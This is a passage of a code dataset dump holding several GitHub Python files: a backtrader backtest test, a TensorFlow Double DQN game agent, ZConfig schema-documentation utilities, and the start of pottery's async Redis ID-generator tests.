"en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "fastapi.FastAPI", "line_number": 5, "usage_type": "call"}, {"api_name": "fastapi.Form", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "12528450563", "text": "import logging\n\nimport backtrader as bt\nfrom backtrader.feeds import PandasData\n\nfrom mfm_learner.datasource import datasource_factory\nfrom mfm_learner.example.backtest.data_loader import comply_backtrader_data_format\nfrom mfm_learner.utils import utils\nimport numpy as np\nlogger = logging.getLogger(__name__)\n\n\nclass TestStrategy(bt.Strategy):\n\n def __init__(self):\n self.value_history=[]\n self.dataclose = self.datas[0].close\n print(\"stock names:\", [data._name for data in self.datas])\n\n # 订单状态通知,买入卖出都是下单\n def notify_order(self, order):\n pass\n\n # 交易状态通知,一买一卖算交易\n def notify_trade(self, trade):\n pass\n\n def next(self):\n # import pdb; pdb.set_trace()\n # print(self.datas[0]._name, self.datas[0].datetime.date(), self.datas[0].close[0])\n self.buy(self.datas[0], size=100) # 第一只股票\n self.buy(self.datas[1], size=50)\n self.buy(self.datas[2], size=10)\n 
self.value_history.append(self.broker.getvalue())\n print(\"Total assets today:\", self.broker.getvalue())\n print(\"Mean of total assets:\", np.array(self.value_history).mean())\n print(\"Std of total assets:\", np.array(self.value_history).std())\n print(\"len:\", len(self.data), \",buflen:\", self.data.buflen())\n print(\"-\"*80)\n\n\n# python -m test.toy.test_multistocks_backtrader\nif __name__ == '__main__':\n utils.init_logger()\n\n start_date = '20200101'\n end_date = '20201201'\n datasource = datasource_factory.get()\n stocks = datasource.index_weight('000905.SH', start_date, end_date)\n stocks = stocks[:5]\n d_start_date = utils.str2date(start_date)\n d_end_date = utils.str2date(end_date)\n\n cerebro = bt.Cerebro()\n cerebro.broker.setcash(100000)\n cerebro.broker.setcommission(commission=0)\n cerebro.addstrategy(TestStrategy)\n\n # feed each stock's data into cerebro one by one\n for stock_code in stocks:\n df_stock = datasource.daily(stock_code, start_date, end_date)\n df_stock = comply_backtrader_data_format(df_stock)\n data = PandasData(dataname=df_stock, fromdate=d_start_date, todate=d_end_date, plot=False)\n cerebro.adddata(data, name=stock_code)\n logger.debug(\"initialized stock [%s] data into cerebro: %d rows\", stock_code, len(df_stock))\n\n cerebro.run(tradehistory=True)\n", "repo_name": "piginzoo/mfm_learner", "sub_path": "test/toy/test_multistocks_backtrader.py", "file_name": "test_multistocks_backtrader.py", "file_ext": "py", "file_size_in_byte": 2385, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 70, "dataset": "github-code", "pt": "61", "api": [{"api_name": "logging.getLogger", "line_number": 10, "usage_type": "call"}, {"api_name": "backtrader.Strategy", "line_number": 13, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 37, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils.init_logger", "line_number": 44, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils", "line_number": 44, "usage_type": "name"}, {"api_name": "mfm_learner.datasource.datasource_factory.get", "line_number": 48, "usage_type": "call"}, {"api_name": "mfm_learner.datasource.datasource_factory", "line_number": 48, "usage_type": "name"}, {"api_name": "mfm_learner.utils.utils.str2date", "line_number": 51, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils", "line_number": 51, "usage_type": "name"}, {"api_name": "mfm_learner.utils.utils.str2date", "line_number": 52, "usage_type": "call"}, {"api_name": "mfm_learner.utils.utils", "line_number": 52, "usage_type": "name"}, {"api_name": "backtrader.Cerebro", "line_number": 54, "usage_type": "call"}, {"api_name": "mfm_learner.example.backtest.data_loader.comply_backtrader_data_format", "line_number": 62, "usage_type": "call"}, {"api_name": "backtrader.feeds.PandasData", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "74097808834", "text": "import numpy as np\nimport math\nimport pandas as pd\nfrom config import Config\nimport os\n\nimport tensorflow as tf\nfrom tensorflow.compat.v1 import placeholder, variable_scope, GraphKeys, get_variable, squared_difference, Session, get_collection, assign, global_variables_initializer, train\nfrom collections import deque\nfrom tensorflow.keras import models, layers, optimizers\nfrom agent import Agent\n\nconf = Config()\n\n# reference from https://github.com/MorvanZhou\nclass AgentsDDQN(Agent):\n    def __init__(self, id, N):\n        self.id = id\n        self.path = \"./model/DDQN/\" + str(N) + \"/\" + str(id)\n        self.state = []\n        self.next_state = []\n        self.has_model = 
os.path.exists(self.path)\n # learning rate\n if self.has_model:\n self.greedy = 0.0001\n self.epsilon = 0.8\n else:\n # exploration strategy\n self.greedy = 0.001\n self.epsilon = 0.5\n # discount factor\n self.gamma = 0.9\n # number of features\n self.features = 7\n # number of actions\n self.actions = 16\n self.replace_target_iter = 1000\n self.memory_size = 50000\n self.epsilon_max = 0.9\n self.epsilon_increment = 0.001\n\n self.step_counter = 0\n self.memory = np.zeros((self.memory_size, self.features*2+2))\n self.build_network()\n\n self.sess = Session()\n self.batch_size = 64\n # tf.summary.FileWriter(\"logs/\", self.sess.graph)\n print(self.id, self.sess)\n self.saver = train.Saver()\n\n if not(os.path.exists(self.path)):\n self.sess.run(global_variables_initializer())\n else:\n self.load_model()\n self.cost_history = []\n \n def set_state(self, state):\n self.state = state\n # try to give up get_state in DQN, just use original state\n \n def build_network(self):\n tf.compat.v1.disable_eager_execution()\n # evaluate network\n self.s_eval = placeholder(tf.float32, [None, self.features], name='s')\n self.q_target = placeholder(tf.float32, [None, self.actions], name='Q_target')\n with variable_scope('eval_net' + str(self.id)) as scope:\n #scope.reuse_variables()\n c_names = ['eval_net_params' + str(self.id), GraphKeys.GLOBAL_VARIABLES]\n n_l1 = 100\n w_init = tf.random_normal_initializer(0.01)\n b_init = tf.constant_initializer(0.01)\n # first layer. collections is used later when assign to target net\n with variable_scope('l1'):\n w1 = get_variable('w1', [self.features, n_l1], initializer=w_init, collections=c_names)\n b1 = get_variable('b1', [1, n_l1], initializer=b_init, collections=c_names)\n l1 = tf.nn.relu(tf.matmul(self.s_eval, w1) + b1)\n # second layer. collections is used later when assign to target net\n with variable_scope('l2'):\n w2 = get_variable('w2', [n_l1, self.actions], initializer=w_init, collections=c_names)\n b2 = get_variable('b2', [1, self.actions], initializer=b_init, collections=c_names)\n self.q_eval = tf.matmul(l1, w2) + b2\n with variable_scope('loss'):\n self.loss = tf.reduce_mean(tf.math.squared_difference(self.q_target, self.q_eval))\n with variable_scope('train'):\n #self._train_op = tf.compat.v1.train.RMSPropOptimizer(self.alpha).minimize(self.loss)\n self._train_op = tf.compat.v1.train.AdagradOptimizer(self.greedy).minimize(self.loss)\n \n # target network\n self.s_target = placeholder(tf.float32, [None, self.features], name='s_') # input\n with variable_scope('target_net' + str(self.id)):\n # c_names(collections_names) are the collections to store variables\n c_names = ['target_net_params' + str(self.id), GraphKeys.GLOBAL_VARIABLES]\n\n # first layer. collections is used later when assign to target net\n with variable_scope('l1'):\n w1 = get_variable('w1', [self.features, n_l1], initializer=w_init, collections=c_names)\n b1 = get_variable('b1', [1, n_l1], initializer=b_init, collections=c_names)\n l1 = tf.nn.relu(tf.matmul(self.s_target, w1) + b1)\n\n # second layer. 
collections is used later when assign to target net\n with variable_scope('l2'):\n w2 = get_variable('w2', [n_l1, self.actions], initializer=w_init, collections=c_names)\n b2 = get_variable('b2', [1, self.actions], initializer=b_init, collections=c_names)\n self.q_next = tf.matmul(l1, w2) + b2\n\n def store_transition(self, action, reward, state_new):\n if not hasattr(self, 'memory_counter'):\n self.memory_counter = 0\n action_number = action[0] - 1 + action[1] * 8\n transition = np.hstack((self.state, [action_number, reward], state_new))\n index = self.memory_counter % self.memory_size\n self.memory[index, :] = transition\n self.memory_counter += 1\n self.state = state_new\n\n def make_decision(self, no_random = False):\n # observation = observation[np.newaxis, :]\n observation = np.array(self.state).reshape([1, self.features])\n actions_value = self.sess.run(self.q_eval, feed_dict={self.s_eval: observation})\n action = np.argmax(actions_value[0][:])\n action_0 = action % 8 + 1\n action_1 = math.floor(action / 8)\n\n if not hasattr(self, 'q'): # record the chosen Qmax values\n self.q = []\n self.running_q = 0\n self.running_q = self.running_q*0.99 + 0.01 * np.max(actions_value)\n self.q.append(self.running_q)\n \n if np.random.uniform() > self.epsilon and not(no_random):\n return self.make_random_decision()\n return [action_0, action_1]\n \n def make_random_decision(self):\n action_0 = np.random.randint(1, 9)\n action_1 = np.random.randint(0, 2)\n return [action_0, action_1]\n \n def replace_target_params(self):\n t_params = get_collection('target_net_params' + str(self.id))\n e_params = get_collection('eval_net_params' + str(self.id))\n self.sess.run([assign(t, e) for t, e in zip(t_params, e_params)])\n \n def update(self):\n # check to replace target parameters\n if self.step_counter % self.replace_target_iter == 0:\n self.replace_target_params()\n print('\\ntarget_params_replaced\\n')\n\n # sample batch memory from all memory\n if self.memory_counter > self.memory_size:\n sample_index = np.random.choice(self.memory_size, size=self.batch_size)\n else:\n sample_index = np.random.choice(self.memory_counter, size=self.batch_size)\n batch_memory = self.memory[sample_index, :]\n\n q_next, q_eval_for_next = self.sess.run(\n [self.q_next, self.q_eval],\n feed_dict={\n self.s_target: batch_memory[:, -self.features:], # next observation\n self.s_eval: batch_memory[:, -self.features:] # next observation\n })\n\n q_eval = self.sess.run(self.q_eval, {self.s_eval: batch_memory[:, :self.features]})\n # change q_target w.r.t q_eval's action\n q_target = q_eval.copy()\n\n batch_index = np.arange(self.batch_size, dtype=np.int32)\n eval_act_index = batch_memory[:, self.features].astype(int)\n reward = batch_memory[:, self.features + 1]\n\n q_target[batch_index, eval_act_index] = reward + self.gamma * np.max(q_next, axis=1)\n\n max_act_for_next = np.argmax(q_eval_for_next, axis=1) # actions with the highest value according to q_eval\n selected_q_next = q_next[batch_index, max_act_for_next] # Double DQN: take q_next at the actions chosen by q_eval\n\n q_target[batch_index, eval_act_index] = reward + self.gamma * selected_q_next\n\n # train eval network\n _, self.cost = self.sess.run([self._train_op, self.loss],\n feed_dict={self.s_eval: batch_memory[:, :self.features],\n self.q_target: q_target})\n self.cost_history.append(self.cost)\n\n # increasing epsilon\n self.epsilon = self.epsilon + self.epsilon_increment if self.epsilon < self.epsilon_max else self.epsilon_max\n\n self.step_counter += 1\n \n def plot_cost(self):\n import matplotlib.pyplot as plt\n 
plt.plot(np.arange(len(self.cost_history)), self.cost_history)\n plt.ylabel('Cost')\n plt.xlabel('training steps')\n plt.show()\n\n def update_greedy(self):\n self.greedy *= 0.95\n\n def load_model(self):\n self.saver.restore(self.sess, self.path)\n \n def plot_qvalue(self):\n import matplotlib.pyplot as plt\n plt.plot(np.array(self.q), label=self.id)\n plt.ylabel('Q eval')\n plt.xlabel('training steps')\n plt.grid()\n plt.show()\n\n def save_model(self, if_plot=False, postfix=''):\n try:\n self.saver.save(self.sess, self.path+postfix)\n print(self.path+postfix + ' saved successfully')\n np.save(self.path + postfix +\".npy\", self.memory)\n if if_plot:\n self.plot_cost()\n except:\n print('ERROR: can not save the model')", "repo_name": "JackXTY/Super-Soccer-Game", "sub_path": "DDQN.py", "file_name": "DDQN.py", "file_ext": "py", "file_size_in_byte": 9377, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "config.Config", "line_number": 13, "usage_type": "call"}, {"api_name": "agent.Agent", "line_number": 16, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 22, "usage_type": "call"}, {"api_name": "os.path", "line_number": 22, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.Session", "line_number": 46, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train.Saver", "line_number": 50, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train", "line_number": 50, "usage_type": "name"}, {"api_name": "os.path.exists", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.global_variables_initializer", "line_number": 53, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.disable_eager_execution", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 65, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 65, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 67, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.GraphKeys.GLOBAL_VARIABLES", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.GraphKeys", "line_number": 69, "usage_type": "name"}, {"api_name": "tensorflow.random_normal_initializer", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.constant_initializer", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 74, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 76, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 79, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 80, "usage_type": 
"call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 81, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 82, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 83, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.math.squared_difference", "line_number": 84, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 84, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 85, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.train.AdagradOptimizer", "line_number": 87, "usage_type": "call"}, {"api_name": "tensorflow.compat", "line_number": 87, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.placeholder", "line_number": 90, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 90, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.GraphKeys.GLOBAL_VARIABLES", "line_number": 93, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.GraphKeys", "line_number": 93, "usage_type": "name"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 96, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 97, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.nn.relu", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 99, "usage_type": "attribute"}, {"api_name": "tensorflow.matmul", "line_number": 99, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.variable_scope", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_variable", "line_number": 104, "usage_type": "call"}, {"api_name": "tensorflow.matmul", "line_number": 105, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 111, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 119, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 121, "usage_type": "call"}, {"api_name": "math.floor", "line_number": 123, "usage_type": "call"}, {"api_name": "numpy.max", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.random.uniform", "line_number": 131, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 131, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 136, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 136, "usage_type": "attribute"}, {"api_name": "numpy.random.randint", "line_number": 137, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 137, "usage_type": "attribute"}, {"api_name": "tensorflow.compat.v1.get_collection", "line_number": 141, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.get_collection", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.compat.v1.assign", "line_number": 143, "usage_type": "call"}, {"api_name": "numpy.random.choice", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 153, "usage_type": "attribute"}, {"api_name": "numpy.random.choice", "line_number": 155, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 155, "usage_type": "attribute"}, 
{"api_name": "numpy.arange", "line_number": 169, "usage_type": "call"}, {"api_name": "numpy.int32", "line_number": 169, "usage_type": "attribute"}, {"api_name": "numpy.max", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 175, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 193, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 193, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 194, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 206, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 206, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 207, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 207, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 208, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 208, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 209, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 209, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 210, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 210, "usage_type": "name"}, {"api_name": "numpy.save", "line_number": 216, "usage_type": "call"}]} +{"seq_id": "4634559618", "text": "import argparse\nimport itertools\nimport sys\nimport textwrap\nfrom abc import ABC\nfrom abc import abstractmethod\nfrom itertools import filterfalse\n\nimport ZConfig.loader\nfrom ZConfig.datatypes import null_conversion\nfrom ZConfig.info import AbstractType\nfrom ZConfig.info import MultiKeyInfo\nfrom ZConfig.info import SectionInfo\nfrom ZConfig.info import SectionType\nfrom ZConfig.info import ValueInfo\n\n\nMARKER = object()\n\n\nclass _VisitorBuilder:\n\n def __init__(self):\n self.visitors = []\n\n def __call__(self, Type):\n def dec(func):\n self.visitors.append((Type, func))\n return func\n return dec\n\n\nclass AbstractSchemaFormatter(ABC):\n\n def __init__(self, schema, stream=None):\n self.stream = stream or sys.stdout\n self._dt = schema.registry.find_name\n\n def write(self, *args):\n print(*args, file=self.stream)\n\n @abstractmethod\n def esc(self, x):\n \"Escape blocks of text if needed\"\n\n def _dedent(self, text):\n # dedent the text to avoid producing unwanted\n # definition lists. 
The XML parser strips leading whitespace from\n # the first line, but preserves it for subsequent lines, so for dedent\n # to work we have to ignore that first line.\n texts = text.split(\"\\n\")\n if len(texts) > 1:\n trail = textwrap.dedent('\\n'.join(texts[1:]))\n text = texts[0] + '\\n' + trail\n return text\n\n @abstractmethod\n def item_list(self):\n \"Context manager for listing description items\"\n\n def _describing(self, description, after):\n if description is not MARKER:\n with self.described_as():\n self.description(description)\n if after:\n after()\n\n @abstractmethod\n def describing(self, description=MARKER, after=None):\n \"description term, optional body\"\n\n def describing_name(self, concrete_name,\n description=MARKER, datatype=None,\n **kwargs):\n with self.describing(description):\n self.concrete_name(concrete_name)\n self.datatype(datatype)\n\n for k, v in sorted(kwargs.items()):\n if v:\n self.write(self.esc(\"({}: {})\".format(k, v)))\n\n def description(self, description):\n if description:\n self.write(self.esc(description))\n\n example = description\n\n @abstractmethod\n def described_as(self):\n \"Description body context manager\"\n\n @abstractmethod\n def abstract_name(self, name):\n \"Abstract name\"\n\n @abstractmethod\n def concrete_name(self, *name):\n \"Concrete name\"\n\n @abstractmethod\n def concrete_section_name(self, *name):\n \"Name of a section a user can type in a config\"\n\n def datatype(self, datatype):\n self.write(\"(%s)\" % self._dt(datatype))\n\n @abstractmethod\n def body(self):\n \"Context manager for the whole document\"\n\n\nclass AbstractSchemaPrinter(ABC):\n\n def __init__(self, schema, stream=None,\n allowed_names=(), excluded_names=()):\n self.schema = schema\n stream = stream or sys.stdout\n self._explained = set()\n self._seen_typenames = set()\n self.fmt = self._schema_formatter(schema, stream)\n\n def _make_predicate(names):\n names = {x.lower() for x in names}\n\n def predicate(name_info):\n name, _ = name_info\n return name and name.lower() in names\n\n return predicate\n\n def _make_filter(names, filt):\n iter_all = self._iter_schema_items\n pred = _make_predicate(names)\n\n def it():\n return filt(pred, iter_all())\n\n return it\n\n if allowed_names:\n self._iter_schema_items = _make_filter(allowed_names, filter)\n\n if excluded_names:\n excluded_names = {x.lower() for x in excluded_names}\n self._iter_schema_items = _make_filter(excluded_names, filterfalse)\n self._included = lambda st: st.name not in excluded_names\n\n @abstractmethod\n def _schema_formatter(self, schema, stream):\n \"Return a formatter\"\n\n def _included(self, st):\n return True\n\n def _explain(self, st):\n if st.name in self._explained:\n return\n\n self._explained.add(st.name)\n\n self.fmt.description(st.description)\n if not self._included(st):\n return\n\n self.fmt.example(getattr(st, 'example', None))\n\n for sub in st.getsubtypenames():\n with self.fmt.item_list():\n self.visit(None, st.getsubtype(sub))\n\n def _iter_schema_items(self):\n def everything():\n return itertools.chain(self.schema.itertypes(),\n self.schema)\n # The abstract types tend to be the most important. Since we\n # only document a concrete type the first time we find it, and\n # we can find extensions of abstract types beneath the abstract\n # type which is itself buried under a concrete section, all the\n # different permutations would be only documented once under\n # that section. 
By exposing these first, they get documented at\n # the top-level, and each concrete section that uses the\n # abstract type gets a reference to it.\n\n def abstract_sections(base):\n for name, info in base:\n if isinstance(info, SectionInfo):\n if info.sectiontype.isabstract():\n yield name, info\n\n # XXX: This isn't catching everything. Witness the\n # relstorage component.\n elif isinstance(info, SectionType):\n yield from abstract_sections(info)\n return itertools.chain(abstract_sections(everything()), everything())\n\n def printSchema(self):\n # side-effect of building may be printing\n self.buildSchema()\n\n def buildSchema(self):\n seen = set() # prevent duplicates at the top-level\n # as we find multiple abstract types\n with self.fmt.body():\n with self.fmt.item_list():\n for name, info in self._iter_schema_items():\n if info in seen:\n continue\n seen.add(info)\n self.visit(name, info)\n\n TypeVisitor = _VisitorBuilder()\n visitors = TypeVisitor.visitors\n\n def visit(self, name, info):\n for t, f in self.visitors:\n if isinstance(info, t):\n f(self, name, info)\n break\n else:\n self._visit_default(name, info)\n\n @TypeVisitor(SectionType)\n def _visit_SectionType(self, name, info):\n if info.name in self._seen_typenames:\n return\n self._seen_typenames.add(info.name)\n with self.fmt.describing():\n if info.datatype is not null_conversion:\n self.fmt.concrete_section_name(info.name)\n else:\n self.fmt.abstract_name(info.name)\n self.fmt.datatype(info.datatype)\n\n with self.fmt.described_as():\n self.fmt.description(info.description)\n self.fmt.example(info.example)\n\n with self.fmt.item_list():\n for sub in info:\n self.visit(*sub)\n\n @TypeVisitor(SectionInfo)\n def _visit_SectionInfo(self, name, info):\n st = info.sectiontype\n if st.isabstract():\n with self.fmt.describing(info.description,\n lambda: self._explain(st)):\n self.fmt.abstract_name(st.name)\n self.fmt.concrete_name(info.name)\n\n else:\n with self.fmt.describing():\n self.fmt.concrete_section_name(info.attribute, info.name)\n self.fmt.datatype(info.datatype)\n\n with self.fmt.described_as():\n with self.fmt.item_list():\n for sub in info.sectiontype:\n self.visit(*sub)\n\n self.fmt.example(info.example)\n\n @TypeVisitor(AbstractType)\n def _visit_AbstractType(self, name, info):\n with self.fmt.describing(info.description,\n lambda: self._explain(info)):\n self.fmt.abstract_name(info.name)\n\n def _visit_default(self, name, info):\n # KeyInfo or MultiKeyInfo\n default = info.getdefault()\n if isinstance(default, ValueInfo):\n default = default.value\n\n name = info.name\n if isinstance(info, MultiKeyInfo):\n name = name + \" (*)\"\n self.fmt.describing_name(name, info.description, info.datatype,\n default=default, metadefault=info.metadefault)\n\n del TypeVisitor\n\n\ndef load_schema(schema, package=None):\n \"\"\"\n Load the *schema* and return the schema object.\n\n By default, *schema* is interpreted as a path on disk to a schema\n file.\n\n If *package* is set to a non-empty string, then *package* must\n name a Python package, and the file in *schema* will be loaded\n from that package. 
The *schema* can either refer to a component\n definition (e.g., ``components.xml``) or to a schema.\n \"\"\"\n\n if not package:\n # A schema file\n schema_reader = argparse.FileType('r')(schema)\n return ZConfig.loader.loadSchemaFile(schema_reader)\n\n try:\n # A component in a package\n schema_template = (\n \"\"\n % (package, schema))\n from io import StringIO\n return ZConfig.loader.loadSchemaFile(StringIO(schema_template))\n except ZConfig.UnknownDocumentTypeError:\n # Ok, not parseable as a component. Try a simple schema.\n return ZConfig.loader.loadSchema(f'package:{package}:{schema}')\n", "repo_name": "zopefoundation/ZConfig", "sub_path": "src/ZConfig/_schema_utils.py", "file_name": "_schema_utils.py", "file_ext": "py", "file_size_in_byte": 9919, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 8, "dataset": "github-code", "pt": "61", "api": [{"api_name": "abc.ABC", "line_number": 33, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 36, "usage_type": "attribute"}, {"api_name": "abc.abstractmethod", "line_number": 42, "usage_type": "name"}, {"api_name": "textwrap.dedent", "line_number": 53, "usage_type": "call"}, {"api_name": "abc.abstractmethod", "line_number": 57, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 68, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 89, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 93, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 97, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 101, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 108, "usage_type": "name"}, {"api_name": "abc.ABC", "line_number": 113, "usage_type": "name"}, {"api_name": "sys.stdout", "line_number": 118, "usage_type": "attribute"}, {"api_name": "itertools.filterfalse", "line_number": 146, "usage_type": "argument"}, {"api_name": "abc.abstractmethod", "line_number": 149, "usage_type": "name"}, {"api_name": "itertools.chain", "line_number": 174, "usage_type": "call"}, {"api_name": "ZConfig.info.SectionInfo", "line_number": 187, "usage_type": "argument"}, {"api_name": "ZConfig.info.SectionType", "line_number": 193, "usage_type": "argument"}, {"api_name": "itertools.chain", "line_number": 195, "usage_type": "call"}, {"api_name": "ZConfig.datatypes.null_conversion", "line_number": 229, "usage_type": "name"}, {"api_name": "ZConfig.info.SectionType", "line_number": 223, "usage_type": "argument"}, {"api_name": "ZConfig.info.SectionInfo", "line_number": 243, "usage_type": "argument"}, {"api_name": "ZConfig.info.AbstractType", "line_number": 264, "usage_type": "argument"}, {"api_name": "ZConfig.info.ValueInfo", "line_number": 273, "usage_type": "argument"}, {"api_name": "ZConfig.info.MultiKeyInfo", "line_number": 277, "usage_type": "argument"}, {"api_name": "argparse.FileType", "line_number": 300, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader.loadSchemaFile", "line_number": 301, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader", "line_number": 301, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 301, "usage_type": "name"}, {"api_name": "ZConfig.loader.loader.loadSchemaFile", "line_number": 309, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader", "line_number": 309, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 309, "usage_type": "name"}, {"api_name": "io.StringIO", "line_number": 309, "usage_type": "call"}, {"api_name": 
"ZConfig.loader.UnknownDocumentTypeError", "line_number": 310, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 310, "usage_type": "name"}, {"api_name": "ZConfig.loader.loader.loadSchema", "line_number": 312, "usage_type": "call"}, {"api_name": "ZConfig.loader.loader", "line_number": 312, "usage_type": "attribute"}, {"api_name": "ZConfig.loader", "line_number": 312, "usage_type": "name"}]} +{"seq_id": "177450072", "text": "'Async distributed Redis-powered monotonically increasing ID generator tests.'\n\n\nimport asyncio\nimport contextlib\nimport unittest.mock\n\nimport pytest\nfrom redis.asyncio import Redis as AIORedis\nfrom redis.commands.core import AsyncScript\nfrom redis.exceptions import TimeoutError\n\nfrom pottery import AIONextID\nfrom pottery import QuorumNotAchieved\n\n\n# TODO: When we drop support for Python 3.9, delete the following definition of\n# aiter().\ntry:\n aiter # type: ignore\nexcept NameError: # pragma: no cover\n def aiter(iterable):\n return iterable.__aiter__()\n\n# TODO: When we drop support for Python 3.9, delete the following definition of\n# anext().\ntry:\n anext # type: ignore\nexcept NameError: # pragma: no cover\n # I got this anext() definition from here:\n # https://github.com/python/cpython/blob/f4c03484da59049eb62a9bf7777b963e2267d187/Lib/test/test_asyncgen.py#L52\n _NO_DEFAULT = object()\n\n def anext(iterator, default=_NO_DEFAULT):\n try:\n __anext__ = type(iterator).__anext__\n except AttributeError:\n raise TypeError(f'{iterator!r} is not an async iterator')\n if default is 